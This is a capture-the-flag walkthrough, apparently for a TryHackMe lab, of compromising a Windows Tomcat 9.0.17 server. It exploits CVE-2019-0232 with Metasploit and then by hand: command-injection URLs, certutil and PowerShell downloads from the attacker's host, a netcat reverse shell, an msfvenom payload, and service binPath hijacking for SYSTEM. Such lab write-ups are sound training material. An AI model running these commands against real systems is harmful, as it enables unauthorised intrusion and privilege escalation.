So for this one we will need to perform some enumeration on the machine to discover what port the web server is on. Hopefully we can gain some information about the web server version through headers, error messages, or through Nmap.
Let’s start off my running Nmap against the target. I will scan all the ports and then do service enumeration against them. I added the –reason flag because this will tell us why Nmap thinks the port is opened or closed and the -Pn option because the host may have been blocking ping probes, and Nmap wasn’t scanning properly. It checks first to see if the host is alive before scanning. In this case we know the host is up so just skip the part of the scan where it verifies it’s up.
nmap -p- -sV -T4 -Pn –reason 10.10.34.185
So we have a few web ports open, and Microsoft terminal services. This verifies that the host is a Windows box.
Let’s run GoBuster against the web servers and see what we can find. GoBuster will take a word list and attempt to see if the server responds with an HTTP 200 code meaning the URL was found. So in this case we have an IP of 10.10.240.242, because my machine timed out it’s different than above. So GoBuster will try http://10.10.240.242:5357/Word. We can tell it to try the various ports as well so we don’t miss anything.
I always like to use Terminator for my terminal, as it’s easy to make new windows and move around them. Simply right click to make a new window and use ALT + Arrow key to move around them.
We will use the dir option to select directory bruteforce mode, -w for word list, and -url to define the url to attack. I split my windows and did all 3 web ports.
Visiting the web server on port 8080 shows us a Tomcat server with version 9.0.17. This is the answer to the first question! We can also trigger an error, by visiting a page that doesn’t exist and we can trigger the 404 error page which discloses the version as well!
Now that we know the version, we can look at Metasploit. We will also look at how to find an exploit without Metasploit, for anyone taking the OSCP, where you are limited to 1 use on 1 of the 5 machines during the exam. If we google Apache Tomcat 9.0.17 we can find a page called CVE Details which talks about remote code execution. This is exactly what we want! It is CVE-2019-0232, which is the answer to question 2. It even shows that there is a Metasploit module for it.
https://www.cvedetails.com/cve/CVE-2019-0232/
Let’s open Metasploit by running msfconsole and then run search CVE-2019-0232.
If we had multiple listed exploits here we could type use 0, or whatever # was shown for the your exploit. Instead of having to type use exploit/windows/http/tomcat_cgi_cmdlineargs
We can run info after selecting the exploit to gain more information about it. This one shows we are abusing the Tomcat CGIServlet and it works on 32 and 64 bit Windows systems. Run show options to list out the options we can set, they are also displayed when you run the info command. We could select a payload but this defaults to a meterpreter shell, which is find for now.
In this case we set the RHOSTS option which is your remote host, the target. We will want to run options so it shows use the payload options. The payload is what will be run after the exploit code. This is what we use to get a reverse shell. We will need to set the TARGETURI option here. We are told that there is a CGI script called elfwhacker.bat. We can guess that the path will need to be /cgi-bin/elfwhacker.bat
set RHOSTS 10.10.240.242
set TARGETURI /cgi-bin/elfwhacker.bat
Check that your payload options are correct and click exploit. If this was on a non-standard port then you would need to set the RPORT option, but since it is on 8080 by default we are fine.
Be sure to set the LHOST to your TUN0 IP or whatever IP is for TryHackMe.
You can click run, but let’s be honest that’s just not as much fun! So type exploit!
Alright the exploit worked! Now run shell to drop into a shell and find the flag, which is int he same directory you landed in C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin\. Run type flag.txt to get the flag.
Now let’s find an exploit without using Metasploit.
Google for Apache Tomcat 9.0.17 Vulnerabilities. We land on the same site CVE Details as before, showing us it’s vulnerable to CVE-2019-0232. (https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-887/version_id-280286/year-2019/opec-1/Apache-Tomcat-9.0.17.html)
Now google for CVE-2019-0232 exploit. Reading more into the vulnerabilities, you can see that the CGI protocol allows passing of command line arguments to the script or program being excuted via URL paramters. (https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/)
Since we know the name of the script, we should be able to pass a command line argument to gain a reverse shell. Let’s test the vulnerabilities to see if it’s Windows or Linux, in case we didn’t enumerate that earlier. Pass the CGI a windows command such as systeminfo.
http://10.10.122.91:8080/cgi-bin/elfwhacker.bat?&systeminfo
Great we know it is a Windows 2019 Standard Server, and we have command injection. We can list users using the windows command net user, but we need to avoid the spaces and replace with a + sign.
Now this is some cool stuff. We have unauthenticated remote command injection. Let’s abuse this vulnerability to get a remote shell by downloading netcat and running it!
Let’s serve an http server using python. If you are on Kali the netcat binary is located at /usr/share/windows-binaries. Run the command python3 -m http.server 7777 to serve a web server from the current directory. Be sure to cd into /usr/share/windows-binaries before running the python server.
In our web browser open this URL to complete the file download. Replace the IP address with your target’s IP address.
http://10.10.122.91:8080/cgi-bin/elfwhacker.bat?&certutil.exe+-urlcache+-f+http://KALIIP:7777/-nc.exe+nc.exe
Certutil is a great way to download files from your Attacker machine onto a windows host. We use the + sign to perform spaces. Normally I try %20 which is space URL encoded, but that wasn’t working here. You should see the file get downloaded from your Python3 server terminal windows. Finally use our command injection and run dir to verify the file was downloaded.
http://10.10.122.91:8080/cgi-bin/elfwhacker.bat?&dir
Great now that we have netcat on the machine, let’s set up a listener on our Kali machine and get a reverse shell! First set up the listener by running
nc -nlvp 1337
-n is for numeric-only IP addresses, no DNS
-l is for listen
-v is for verbose. This will give us more information about incoming connections if there is some available. Goof for possible debugging purposes.
-p this is for the port to listen on
Now we can use our command injection to call back to our Netcat listener. Use this URL and replace the IP address with your own.
http://10.10.122.91:8080/cgi-bin/elfwhacker.bat&nc.exe+10.6.43.108+1337+-e+cmd.exe
It will look like nothing loaded and the site just stalls, but check your listener and we have a shell!
Run whoami /priv to see what we may be able to abuse to escalate our privileges.
We can use JuicyPotato exploit to gain privileges here.
https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
On your Kali machine run wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe then host a python server so we can download the file to the windows host using python3 -m http.server 7777
Now let’s use powershell to download this file from our web server. We could use Certutil again, but I just wanted to show another technique.
First we will call powershell, set the execution policy to bypass and then invoke a web request, outputting the file to a writable directory.
powershell.exe -ep bypass Invoke-WebRequest “http://10.6.43.108:7777/JuicyPotato.exe” -OutFile “C:\Windows\Temp\JuicyPotato.exe”
We could rename the Outfile to be something less suspicious such as cmd.exe, but we aren’t going for stealth in this case.
We need to find a CLSID from the website below, and select the operating system. Sadly Windows Server 2019 isn’t there. After testing this out and stumbling upon an article Microsoft has now fixed JuicyPotato for Windows Server 2019.
Let’s look for unquoted service paths. I tried to reverse engineer the binary, but I didn’t have any luck and figured that wasn’t the way.
To search for unquoted service paths run the following command:
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v “C:\Windows\\” | findstr /i /v “””
Great it appears that this service doesn’t have the quotes around it and the path has spaces in it. That means that it will try to run various names of executables. If we can write to a directory above or modify the service itself we can gain privilege escalation.
In this case it will try to execute
- C:\Program.exe
- C:\Program Files\TBFC.exe
- C:\Program Files\TBFC APPS\Elf.exe
- C:\Program Files\TBCF APPS\Elf Whacker\Elfwhacker.exe
We can try to either simply replace Elfwhacker.exe with our own malicious exe or attempt to create one of the other executables. It all depends on where we have write access to. Before making our malicious exe, let’s verify what folders we can write into. For this we will use a tool called icacls. We will want to check for Everyone or Authenticated Users. Additionally we can check for any groups we may be a part of. To discover these groups run whoami /groups.
Looks like we are an Administrator so we should be able to edit any folder. We can check the folder using icacls to verify we can write over the executable.
icacls “C:\Program Files\TBFC APPS\Elf Whacker\Elfwhacker.exe”
Great our current user Itbcf-web-01\elfmcskidy has full control over that folder, let’s just overwrite the binary. First copy nc.exe out of the cgi-bin folder over to C:\Windows\Temp\ just for easier commands. Let’s go ahead and generate our malicious binary.
copy “C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin\nc.exe C :\Windows\Temp\”
On your kali machine generate the binary with the below command:
msfvenom –platform Windows -p windows/exec CMD=”C:\Windows\Temp\nc.exe 10.6.43.108 1337 -e cmd.exe” -f exe > Elfwhacker.exe
-a is for the architecture
–platform just specifies the Windows platform
-p is for the payload we want to use. In this case I just want to run a command so it’s windows/exec
CMD= is the command you want to run. In this case we just want to run netcat to make a call back to use. Since the process executes as SYSTEM, we will get an elevated shell back.
-f is for the format. We want to match the name and format (exe) that the service is expecting.
> is to output the code to an executable called Elfwhacker.exe
Now server it up with python using pytnon3 -m http.server 7777
Move into the directory C:\Program Files\TBFC APPS\Elf Whacker\ and download our file.
certutil.exe -urlcache -f http://10.6.43.108:7777/Elfwhacker.exe Elfwhacker.exe
Start a netcat listener on kali by running nc -nlvp 1337
Finally stop the service and start the service, we can do this in the same command.
sc stop Elfwhacker && sc start Elfwhacker
It turns our my binary wasn’t firing for some reason. So what we can do is to configure the service to just run Netcat from C:\Windows\Temp\ where we stored it earlier.
sc config Elfwhacker binPath= “C:\Windows\TEMP\nc.exe 10.6.43.108 1337 -e cmd.exe”
Now start and stop the service. In my case stop times out, but I was able to start it afterwards. This command and check for your shell.
sc stop Elfhwacker && sc start Elfwhacker
If it tells you the service did not respond, try to simply start the service.
sc start Elfwhacker
If that still doesn’t work stop the service and then start it with 2 seperate commands.
Check your netcat listener and run a whoami to verify we are nt authority\system
There you have it another challenge down! I hope you learned a lot from this post! Remember if you can find a Metasploit module to exploit something, there’s a way to exploit it without Metasploit. Always take the time to learn how to exploit vulnerabilities, it will help you greatly when Metasploit isn’t an option.